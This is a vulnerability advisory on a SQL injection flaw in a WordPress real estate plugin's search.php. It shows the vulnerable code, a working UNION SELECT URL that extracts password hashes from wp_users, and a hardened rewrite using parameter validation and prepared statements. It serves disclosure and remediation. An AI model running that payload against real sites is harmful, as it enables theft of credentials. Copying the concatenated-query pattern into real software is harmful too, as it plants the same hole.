Advisory
Analysis of vulnerability
The FireStorm Professional Real Estate Plugin for WordPress lets a user search for real estate by province or country. The search is implemented in the file search.php:
```php
<?php
require("../../../wp-config.php");

if(isset($_GET['ProvinceID'])){
    // ProvinceID is concatenated straight into both queries, unvalidated and unescaped
    $FSREPCities = $wpdb->get_results("SELECT * FROM ".$wpdb->prefix."fsrep_cities WHERE province_id = ".$_GET['ProvinceID']." ORDER BY city_name");
    $FSREPProvince = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."fsrep_provinces WHERE province_id = ".$_GET['ProvinceID']);
    $HTTPREFERER = explode('?', $_SERVER['HTTP_REFERER']);
    if (substr($HTTPREFERER[0], -13) == '/add-listing/') {
        echo "obj.options[obj.options.length] = new Option('Select ".$FSREPconfig['CityLabel'].",'');\n";
    } else {
        echo "obj.options[obj.options.length] = new Option('Show All of ".$FSREPProvince->province_name."','');\n";
    }
    $count = 1;
    foreach ($FSREPCities as $FSREPCities) {
        echo "obj.options[obj.options.length] = new Option('".$FSREPCities->city_name."','".$FSREPCities->city_id."');\n";
        if ($FSREPCities->city_id == $_GET['cvalue']) {
            echo "obj.options[$count].selected = true;";
        }
        $count++;
    }
}

if(isset($_GET['CountryID'])){
    // CountryID is handled the same way: raw GET value inside the SQL string
    $FSREPProvinces = $wpdb->get_results("SELECT * FROM ".$wpdb->prefix."fsrep_provinces WHERE country_id = ".$_GET['CountryID']." ORDER BY province_name");
    $FSREPCountry = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."fsrep_countries WHERE country_id = ".$_GET['CountryID']);
    $count = 1;
    echo "obj.options[obj.options.length] = new Option('Select ".$FSREPconfig['ProvinceLabel']."','');\n";
    foreach ($FSREPProvinces as $FSREPProvinces) {
        echo "obj.options[obj.options.length] = new Option('".$FSREPProvinces->province_name."','".$FSREPProvinces->province_id."');\n";
        if ($FSREPProvinces->province_id == $_GET['cvalue']) {
            echo "obj.options[$count].selected = true;";
        }
        $count++;
    }
}
?>
```
By providing either a ProvinceID or a CountryID, we can make the application pass the value into two SQL queries (one via get_results, one via get_row). In both branches the value is taken directly from the GET parameter without any sanitization or type check, so the parameter is injectable and an attacker can select arbitrary data from the database. For instance, the password hash of a user can be selected like this:
```
http://192.168.80.130/wordpress/wp-content/plugins/fs-real-estate-plugin/search.php?ProvinceID=35335%20UNION%20SELECT%201,%20user_pass,%203,%204,%205,%206,%207,%208%20from%20wp_users
```
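The root cause is string concatenation of a request parameter into SQL. The following is an added example of how the ProvinceID branch of search.php could be hardened; it is not the plugin's own code or an official patch. It assumes the WordPress global `$wpdb` (and therefore runs only inside a WordPress install), keeps the original table and column names, and treats `$FSREPconfig` and the referrer check as out of scope. The CountryID branch would be fixed in exactly the same way.

```php
<?php
// Added example (not the plugin's code): hardened ProvinceID branch of search.php.
// Assumes WordPress's global $wpdb; the include path is the one used by the original file.
require("../../../wp-config.php");

// Validate first: anything that is not a positive integer never reaches the query.
// filter_input() returns null when the parameter is absent and false when it is not an int.
$province_id = filter_input(
    INPUT_GET,
    'ProvinceID',
    FILTER_VALIDATE_INT,
    array('options' => array('min_range' => 1))
);

if ($province_id !== null && $province_id !== false) {
    // Bind the value instead of concatenating it. %d makes $wpdb->prepare() emit an
    // integer, so the query text can no longer be altered by the parameter.
    $FSREPCities = $wpdb->get_results($wpdb->prepare(
        "SELECT city_id, city_name FROM {$wpdb->prefix}fsrep_cities WHERE province_id = %d ORDER BY city_name",
        $province_id
    ));
    $FSREPProvince = $wpdb->get_row($wpdb->prepare(
        "SELECT province_name FROM {$wpdb->prefix}fsrep_provinces WHERE province_id = %d",
        $province_id
    ));

    // cvalue is only ever compared with an integer id, so validate it as one as well.
    $selected = filter_input(INPUT_GET, 'cvalue', FILTER_VALIDATE_INT);

    // The output is JavaScript, so build the string literals with json_encode()
    // rather than splicing database values between single quotes.
    $label = $FSREPProvince ? 'Show All of ' . $FSREPProvince->province_name : 'Show All';
    echo "obj.options[obj.options.length] = new Option(" . json_encode($label) . ", '');\n";

    $count = 1;
    foreach ($FSREPCities as $city) {
        echo "obj.options[obj.options.length] = new Option("
            . json_encode($city->city_name) . ", "
            . json_encode((string) $city->city_id) . ");\n";
        if ($selected !== null && $selected !== false && (int) $city->city_id === $selected) {
            echo "obj.options[$count].selected = true;\n";
        }
        $count++;
    }
}
```

Two independent layers are at work: the integer validation rejects a payload like the one above before any database call is made, and `$wpdb->prepare()` with `%d` guarantees that, even if validation were later loosened, the parameter is bound as a value rather than spliced into the statement. Selecting the needed columns instead of `*` is not a security control, but it keeps the query from silently returning columns the page does not use.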